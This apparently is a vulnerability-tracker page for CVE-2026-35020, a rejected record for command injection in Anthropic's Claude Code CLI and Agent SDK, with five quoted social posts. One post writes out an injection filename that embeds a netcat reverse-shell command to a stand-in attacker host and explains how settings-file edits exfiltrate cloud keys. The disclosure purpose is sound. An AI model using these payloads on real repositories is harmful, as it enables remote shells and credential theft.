CVE-2026-35020Disclosure

LOW

Signal is active with 1 mentions in latest observed window

Immediate actions

  • Patch affected systems immediately

Recommended action window: Monitor and triage in normal cycle

NVD description

Rejected reason: This CVE ID has been rejected by the its CVE Numbering Authority (CNA). It was determined that the attack requires an attacker to already control arbitrary environment variables, a level of access they consider functionally equivalent to code execution and outside the threat model of CLI tools.

0.5/ 10 priority

Priority

LOW

Exploitation

NONE

PoC

NONE

Patch

AVAILABLE

Momentum

STABLE

Threat summary

  • Patch or workaround signal is available
  • 5 mentions across 3 observed days
  • Momentum state: stable

What's happening

  • Patch or workaround mentioned in 2 signals
  • Technical details provided in 5 signals
  • Disclosure: 4 classified signals
  • Peaked 2d ago at 3 mentions (2026-04-06); latest day: 1
  • 5 total mentions across 3 days

Deep dive

Activity timeline5 mentions / 3d
01223Mentions · 2026-04-06: 3Mentions · 2026-04-19: 1Mentions · 2026-05-01: 1Patch / Workaround · 2026-04-19: 1Patch / Workaround · 2026-05-01: 1Technical Details · 2026-04-06: 3Technical Details · 2026-04-19: 1Technical Details · 2026-05-01: 104-0604-1905-01
Signal classification2 categories
Disclosure
480.0%
Patch
120.0%
Referenced assets4 URLs
Classification over time
DateTotalLabels
2026-04-063
Disclosure3
2026-04-191
Disclosure1
2026-05-011
Patch1
Full discourse5 posts
  • CVEFind.com@CveFindCom
    Disclosure

    [CVE-2026-35020: HIGH] Security alert: Anthropic Claude CLI and Agent SDKs have OS command injection vulnerability, allowing local attackers to run arbitrary commands via manipulated TERMINAL environment var...#cve,CVE-2026-35020,#cybersecurity https://cvefind.com/CVE-2026-35020

    Post summary

    A high‑severity OS command injection flaw (CVE‑2026‑35020) in Anthropic Claude CLI and Agent SDKs has been disclosed, allowing local attackers to execute arbitrary commands via a manipulated TERMINAL environment variable.

    0001072
    619 followersView on X
  • DFIR Lab@DFIR_Lab
    Patch

    🚨 HIGH: CVE-2026-35020 (CVSS 8.4) OS command injection in Anthropic Claude Code CLI & Agent SDK. Attackers can execute arbitrary commands via TERMINAL env variable manipulation. Impact: Full system compromise Mitigation: Validate TERMINAL variable https://t.co/cbqDtV0JTZ

    Post summary

    High‑severity OS command injection vulnerability in Anthropic Claude CLI and Agent SDK that can be mitigated by validating the TERMINAL environment variable.

    0000034
    11 followersView on X
  • SecureChap@SecureChap
    Disclosure

    CVE-2026-35022 in Claude Code let a single pull request steal API keys. One of three shell injection flaws disclosed this month in Claude Code 2.1.x. Root cause across all three: Node.js spawn with shell: true and unsanitized string interpolation. CWE-78. CVE-2026-35020 hit at CLI startup. Terminal detection ran sh -c with the TERMINAL env var interpolated in. A .env file or CI runner variable containing $() executed code on load, zero user interaction. CVE-2026-35021 struck during file opens. The editor invocation placed file paths inside double-quoted shell strings. POSIX section 2.2.3: double quotes do not block $() or backticks. A repo file named report`nc -e /bin/sh http://att.com 4444`.md fires on edit. CVE-2026-35022, CVSS 9.8. Authentication helpers in .claude/settings.json - like awsAuthRefresh - ran with full shell interpretation, outside the agent sandbox. Non-interactive mode skipped the trust dialog. A pull request editing settings.json exfiltrated AWS, GCP, and Anthropic API keys straight out of CI. Reported by Phoenix Security's Purple Code Navigator on 2026-03-31 after an accidental source code leak. Anthropic acknowledged the next day. Fix pattern: argv-based spawn, never exec with a shell string. Review .claude/settings.json diffs the way you review Dockerfile diffs. When your agent has your cloud credentials and reads files from random repos, a filename becomes an exploit.

    Post summary

    The text discloses three shell injection vulnerabilities in Claude Code 2.1.x that can lead to credential exfiltration, along with technical details, mitigation guidance, and a brief patch strategy.

    0000054
    6 followersView on X
  • Infoflowcloud@infoflowcloud
    Disclosure

    🚨*CVE* CVE-2026-35020 Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in the command lookup helper and deep-link terminal launcher that allows … https://www.cve.org/CVERecord?id=CVE-2026-35020 ----- Traducción: CVE-2026-35020 Ant… http://infoflow.cloud`

    Post summary

    The post announces a new OS command injection vulnerability (CVE-2026-35020) affecting Anthropic Claude Code CLI and Claude Agent SDK, detailing the affected components but not providing a PoC or exploit.

    0000056
    67 followersView on X
  • CVE@CVEnew
    Disclosure

    CVE-2026-35020 Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in the command lookup helper and deep-link terminal launcher that allows … https://www.cve.org/CVERecord?id=CVE-2026-35020

    Post summary

    The post announces an OS command injection flaw in Anthropic Claude Code CLI and Claude Agent SDK, detailing the vulnerable components but providing no exploit code, active exploitation evidence, or mitigation steps.

    00000237
    57.0K followersView on X

Explore more